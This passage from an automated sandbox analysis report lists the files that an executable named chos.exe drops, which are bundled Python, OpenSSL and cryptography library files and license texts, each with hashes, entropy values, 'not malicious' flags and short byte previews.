SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI74682\certifi\cacert.pem

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299427
Entropy (8bit):	6.047872935262006
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:	50EA156B773E8803F6C1FE712F746CBA
SHA1:	2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:	94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:	01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.818583535960129
Encrypted:	false
SSDEEP:	96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
MD5:	56FE4F6C7E88212161F49E823CCC989A
SHA1:	16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
SHA-256:	002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
SHA-512:	7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	5.953784637413928
Encrypted:	false
SSDEEP:	3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
MD5:	10116447F9276F10664BA85A5614BA3A
SHA1:	EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
SHA-256:	C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
SHA-512:	C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\METADATA

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5724
Entropy (8bit):	5.120429897887076
Encrypted:	false
SSDEEP:	96:DlkQIUQIhQIKQILbQIRIaMPktjaVMxsxA2ncEvGDfe0HEdwGArNZG0JQTQCQx5Kw:dcPuPwsrcEvGDfe0HENA5w0JQTQ9x59H
MD5:	526D9AC9D8150602EC9ED8B9F4DE7102
SHA1:	DBA2CB32C21C4B0F575E77BBCDD4FA468056F5E3
SHA-256:	D95F491ED418DC302DB03804DAF9335CE21B2DF4704587E6851EF03E1F84D895
SHA-512:	FB13A2F6B64CB7E380A69424D484FC9B8758FA316A7A155FF062BFDACDCA8F2C5D2A03898CD099688B1C16A5A0EDCECFC42BF0D4D330926B10C3FCE9F5238643
Malicious:	false
Preview:	Metadata-Version: 2.3.Name: cryptography.Version: 44.0.0.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\RECORD

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	16286
Entropy (8bit):	5.5843411690874865
Encrypted:	false
SSDEEP:	192:hXy1uJ/l45jEVeK8RThXsI4WJi6LAciTwqUIq+NX6ih5V3Uqd8q:hXFlMEVd2sIJi6LAciTwqU/+96ihL8q
MD5:	14AC8030DE12534736F742CE05989BD6
SHA1:	5495082B702CC31048065B1F6546AF487CB0BC00
SHA-256:	B593F9EDEAA8BA8B3F8DD147D52A27D904E812E544980265DF234D3958B12517
SHA-512:	B1960D3485E44AA6F4FE7C0023AEEBB4FA00CC16F0340F2C90CB5FCBF2D1C32FDC4FBFB8546EA0C740AA44D72F9A8810F8421C65227F9182972491A1DFDFFEBC
Malicious:	false
Preview:	cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-313.pyc,,..cryptography/__pycache__/__init__.cpython-313.pyc,,..cryptography/__pycache__/exceptions.cpython-313.pyc,,..cryptography/__pycache__/fernet

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	5.0373614967294325
Encrypted:	false
SSDEEP:	3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
MD5:	A868F93FCF51C4F1C25658D54F994349
SHA1:	535C88A10911673DEABB7889D365E81729E483A6
SHA-256:	1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
SHA-512:	EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\licenses\LICENSE

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.61968998873571
Encrypted:	false
SSDEEP:	3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:	8C3617DB4FB6FAE01F1D253AB91511E4
SHA1:	E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:	3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:	77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:	false
Preview:	This software is made available under the terms of either of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of both these licenses..

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\licenses\LICENSE.APACHE

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11360
Entropy (8bit):	4.426756947907149
Encrypted:	false
SSDEEP:	192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:	4E168CCE331E5C827D4C2B68A6200E1B
SHA1:	DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:	AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:	F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\licenses\LICENSE.BSD

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1532
Entropy (8bit):	5.058591167088024
Encrypted:	false
SSDEEP:	24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:	5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:	EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:	602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:	DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:	false
Preview:	Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography\hazmat\bindings\_rust.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8292864
Entropy (8bit):	6.493076254122072
Encrypted:	false
SSDEEP:	98304:Y4sf3zg+qUuQdPJMqYLSxuBLZqwt0kDO+5+O:cdeqYLSxuBLZrGjq+
MD5:	34293B976DA366D83C12D8EE05DE7B03
SHA1:	82B8EB434C26FCC3A5D9673C9B93663C0FF9BF15
SHA-256:	A2285C3F2F7E63BA8A17AB5D0A302740E6ADF7E608E0707A7737C1EC3BD8CECC
SHA-512:	0807EC7515186F0A989BB667150A84FF3BEBCC248625597BA0BE3C6F07AD60D70CF8A3F65191436EC16042F446D4248BF92FCD02212E459405948DB10F078B8E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.j...j...j....F..j.......j.......j.......j.......j.......j.......j...j...h.......i...j...j.......j.......j..Rich.j..........................PE..d....^Gg.........." ...*.R\..n"......~Z.......................................~...........`...........................................x.X.....x...............y...............~.......o.T.....................o.(...p.o.@............p\.8............................text....Q\......R\................. ..`.rdata..P9...p\..:...V\.............@..@.data... >....x.......x.............@....pdata........y.......y.............@..@.reloc........~.......}.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5232408
Entropy (8bit):	5.940072183736028
Encrypted:	false
SSDEEP:	98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
MD5:	123AD0908C76CCBA4789C084F7A6B8D0
SHA1:	86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
SHA-256:	4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
SHA-512:	80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.\|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...\|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	792856
Entropy (8bit):	5.57949182561317
Encrypted:	false
SSDEEP:	12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
MD5:	4FF168AAA6A1D68E7957175C8513F3A2
SHA1:	782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
SHA-256:	2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
SHA-512:	C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...\|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\pyexpat.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	201488
Entropy (8bit):	6.375994899027017
Encrypted:	false
SSDEEP:	6144:cAPHiRwroqoLHMpCSNVysh9CV2i6P/1vTg:6wrExSU6PdvTg
MD5:	CF2C3D127F11CB2C026E151956745564
SHA1:	B1C8C432FC737D6F455D8F642A4F79AD95A97BD3
SHA-256:	D3E81017B4A82AE1B85E8CD6B9B7EB04D8817E29E5BC9ECE549AC24C8BB2FF23
SHA-512:	FE3A9C8122FFFF4AF7A51DF39D40DF18E9DB3BC4AED6B161A4BE40A586AC93C1901ACDF64CC5BFFF6975D22073558FC7A37399D016296432057B8150848F636E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P.P.P.(t..P...P...P...P...P....P..(.P.P..P....P....P......P....P.Rich.P.........................PE..d.....g.........." ...)..................................................... ............`............................................P... ............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\python3.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70416
Entropy (8bit):	6.1258200129869405
Encrypted:	false
SSDEEP:	768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
MD5:	16855EBEF31C5B1EBE767F1C617645B3
SHA1:	315521F3A748ABFA35CD4D48E8DD09D0556D989B
SHA-256:	A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
SHA-512:	C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\python313.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6083856
Entropy (8bit):	6.126922729922386
Encrypted:	false
SSDEEP:	49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
MD5:	B9DE917B925DD246B709BB4233777EFD
SHA1:	775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
SHA-256:	0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
SHA-512:	F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	6.554484610649281
Encrypted:	false
SSDEEP:	384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
MD5:	20831703486869B470006941B4D996F2
SHA1:	28851DFD43706542CD3EF1B88B5E2749562DFEE0
SHA-256:	78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
SHA-512:	4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\LICENSE

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11358
Entropy (8bit):	4.4267168336581415
Encrypted:	false
SSDEEP:	192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
